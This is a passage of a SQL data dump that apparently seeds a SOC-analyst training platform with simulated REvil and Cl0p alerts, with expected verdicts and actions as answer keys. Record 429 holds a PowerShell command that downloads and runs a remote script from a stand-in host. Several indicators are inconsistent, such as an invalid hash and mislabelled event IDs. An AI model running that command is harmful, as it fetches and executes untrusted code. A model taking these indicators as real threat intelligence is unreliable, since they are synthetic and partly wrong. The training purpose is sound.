Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.031Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T02:15:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"event_type\\\":\\\"Registry Change Detected\\\",\\\"host\\\":\\\"compromised-host.local\\\",\\\"user\\\":\\\"administrator\\\",\\\"ip_address\\\":\\\"192.168.1.10\\\",\\\"external_ip\\\":\\\"185.92.220.65\\\",\\\"registry_key\\\":\\\"HKLM\\\\\\\\Software\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\\\\\\maliciousApp\\\",\\\"registry_value\\\":\\\"C:\\\\\\\\ProgramData\\\\\\\\REvil\\\\\\\\malicious.exe\\\",\\\"hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"description\\\":\\\"Registry key modified to establish persistence by REvil malware.\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(426, 'Lateral Movement via RDP', 'high', 'Network Traffic Analysis', 'Anomalous RDP connection detected from a known malicious IP address using stolen credentials. This activity matches the lateral movement tactics commonly associated with the REvil group, indicating an attempt to expand access within the network.', 'Lateral Movement', 'T1021.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"185.92.220.25\",\"dest_ip\":\"192.168.1.10\",\"username\":\"j.doe\",\"login_method\":\"RDP\",\"event_id\":\"4624\",\"event_type\":\"Logon\",\"logon_type\":\"10\",\"status\":\"Success\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"filename\":\"malicious_rdp_session.exe\"}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with REvil operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Destination IP within internal network\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Active Directory\",\"verdict\":\"internal\",\"details\":\"Valid user account within the organization\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious RDP session file\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(427, 'Data Exfiltration Detected', 'high', 'Data Loss Prevention (DLP) System', 'The DLP system detected a large volume of sensitive data being transferred to an unauthorized external IP address. The data includes financial documents and proprietary design files. The activity is consistent with the REvil attack chain, indicating a potential preparation for ransomware deployment.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T16:42:00Z\",\"event_id\":\"EXFIL-2023-0005\",\"source_ip\":\"192.168.4.25\",\"destination_ip\":\"203.0.113.45\",\"file_hash\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"file_name\":\"financial_report_q3_2023.xlsx\",\"username\":\"jdoe\",\"action\":\"exfiltration\",\"protocol\":\"HTTPS\",\"data_size\":\"2GB\",\"malware_association\":\"REvil\",\"risk_score\":85}', '2026-01-04 04:25:33', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.4.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal database\",\"verdict\":\"internal\",\"details\":\"Internal IP address of user\'s workstation\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known malicious activities\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3f786850e387550fdab836ed7e6dc881de23001b\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with REvil exfiltration tools\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"financial_report_q3_2023.xlsx\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"clean\",\"details\":\"Standard financial document\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User of the affected machine\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:31:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:30:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:29:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"},{\"timestamp\":\"2026-02-01T20:28:19.033Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-14T16:42:00Z\\\",\\\"event_id\\\":\\\"EXFIL-2023-0005\\\",\\\"source_ip\\\":\\\"192.168.4.25\\\",\\\"destination_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"3f786850e387550fdab836ed7e6dc881de23001b\\\",\\\"file_name\\\":\\\"financial_report_q3_2023.xlsx\\\",\\\"username\\\":\\\"jdoe\\\",\\\"action\\\":\\\"exfiltration\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"malware_association\\\":\\\"REvil\\\",\\\"risk_score\\\":85}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(428, 'Spear Phishing Email Detected', 'high', 'Email Gateway Logs', 'A spear phishing email has been detected targeting key employees, originating from a known malicious IP address associated with the Cl0p ransomware group. The email contains a crafted attachment designed to deploy an initial payload and harvest credentials.', 'Initial Access', 'T1566.001', 1, 'investigating', 49, '{\"timestamp\":\"2023-10-12T08:30:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.23\",\"recipient\":\"j.doe@company.com\",\"sender\":\"support@security-update.com\",\"subject\":\"Urgent: Security Update Required\",\"attachment\":\"Security_Update.exe\",\"attachment_hash\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"message_id\":\"<20231012083000.123456@company.com>\"}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p ransomware group.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"support@security-update.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Phishing Database\",\"verdict\":\"malicious\",\"details\":\"Email used in prior spear phishing campaigns.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"f2a6b7a8c9d4e6f8b5c4d6e7f8a9b0c1\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known Cl0p payload.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"j.doe@company.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Employee email address.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Spear Phishing Email Detected\",\"date\":\"2026-02-01T20:32:19.034Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(429, 'Malicious Script Execution', 'high', 'Endpoint Detection and Response (EDR)', 'A malicious script was executed on the endpoint to download and execute additional payloads, establishing a backdoor for persistent control. This follows a successful phishing attack.', 'Execution', 'T1059.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T08:45:33Z\",\"event_type\":\"process_creation\",\"host_ip\":\"10.12.34.56\",\"username\":\"johndoe\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString(\'http://malicious.site/payload.ps1\')\",\"file_hash\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"attacker_ip\":\"203.0.113.45\",\"file_name\":\"payload.ps1\",\"process_id\":4521}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple malware distribution campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"ebd0c9b9a1d3b3c4f5a6d7e8f9a0b1c2d3e4f5g6h7i8j9k0\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known backdoor installation scripts.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"payload.ps1\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"Unusual script executed post-phishing attack.\"}},{\"id\":\"artifact_4\",\"type\":\"ip\",\"value\":\"10.12.34.56\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"IP address of compromised host.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(430, 'Establishing Persistence via Registry Modification', 'high', 'Windows Registry Logs', 'Cl0p has been observed modifying registry keys to ensure their backdoor persists through system reboots. This technique is used to maintain a foothold in the system and evade basic detection.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-10-23T14:22:35Z\",\"event_id\":4657,\"user\":\"administrator\",\"computer_name\":\"WIN-12AB34CD56\",\"registry_key_path\":\"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\",\"registry_value_name\":\"MaliciousApp\",\"registry_value_data\":\"\\\"C:\\\\Windows\\\\System32\\\\malicious.exe\\\"\",\"source_ip\":\"192.168.1.100\",\"attacker_ip\":\"203.0.113.45\",\"file_hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}', '2026-01-04 04:38:04', '2026-02-14 16:52:12', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"OSINT Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with known Cl0p APT activities.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash matches known Cl0p malware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Local Threat Database\",\"verdict\":\"suspicious\",\"details\":\"File name commonly used by Cl0p group.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'MAL', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"},{\"timestamp\":\"2026-02-01T20:28:19.036Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-23T14:22:35Z\\\",\\\"event_id\\\":4657,\\\"user\\\":\\\"administrator\\\",\\\"computer_name\\\":\\\"WIN-12AB34CD56\\\",\\\"registry_key_path\\\":\\\"HKLM\\\\\\\\SOFTWARE\\\\\\\\Microsoft\\\\\\\\Windows\\\\\\\\CurrentVersion\\\\\\\\Run\\\",\\\"registry_value_name\\\":\\\"MaliciousApp\\\",\\\"registry_value_data\\\":\\\"\\\\\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\malicious.exe\\\\\\\"\\\",\\\"source_ip\\\":\\\"192.168.1.100\\\",\\\"attacker_ip\\\":\\\"203.0.113.45\\\",\\\"file_hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(431, 'Credential Dumping in Progress', 'critical', 'Security Information and Event Management (SIEM)', 'With persistence established, Cl0p begins dumping credentials from memory, preparing to infiltrate additional systems within the network.', 'Lateral Movement', 'T1003 - Credential Dumping', 1, 'resolved', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"event_id\":\"4624\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"username\":\"admin_user\",\"process_name\":\"lsass.exe\",\"dump_file\":\"C:\\\\Windows\\\\Temp\\\\dumplog.dmp\",\"hash\":\"ab56b4d92b40713acc5af89985d4b786\",\"event_type\":\"Credential Dumping\",\"message\":\"Credential dumping detected from memory using lsass.exe.\"}', '2026-01-04 04:38:04', '2026-02-16 21:29:52', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with Cl0p APT activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal host targeted for credential dumping\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"suspicious\",\"details\":\"High privilege user account targeted\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"lsass.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"System Logs\",\"verdict\":\"suspicious\",\"details\":\"File used for storing dumped credentials\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"ab56b4d92b40713acc5af89985d4b786\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with credential dumping tools\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Expert', 'NDR', 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-02-01T20:32:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:31:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:30:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:23:45Z\\\",\\\"event_id\\\":\\\"4624\\\",\\\"source_ip\\\":\\\"185.92.220.45\\\",\\\"destination_ip\\\":\\\"192.168.1.25\\\",\\\"username\\\":\\\"admin_user\\\",\\\"process_name\\\":\\\"lsass.exe\\\",\\\"dump_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\Temp\\\\\\\\dumplog.dmp\\\",\\\"hash\\\":\\\"ab56b4d92b40713acc5af89985d4b786\\\",\\\"event_type\\\":\\\"Credential Dumping\\\",\\\"message\\\":\\\"Credential dumping detected from memory using lsass.exe.\\\"}\"},{\"timestamp\":\"2026-02-01T20:29:19.037Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 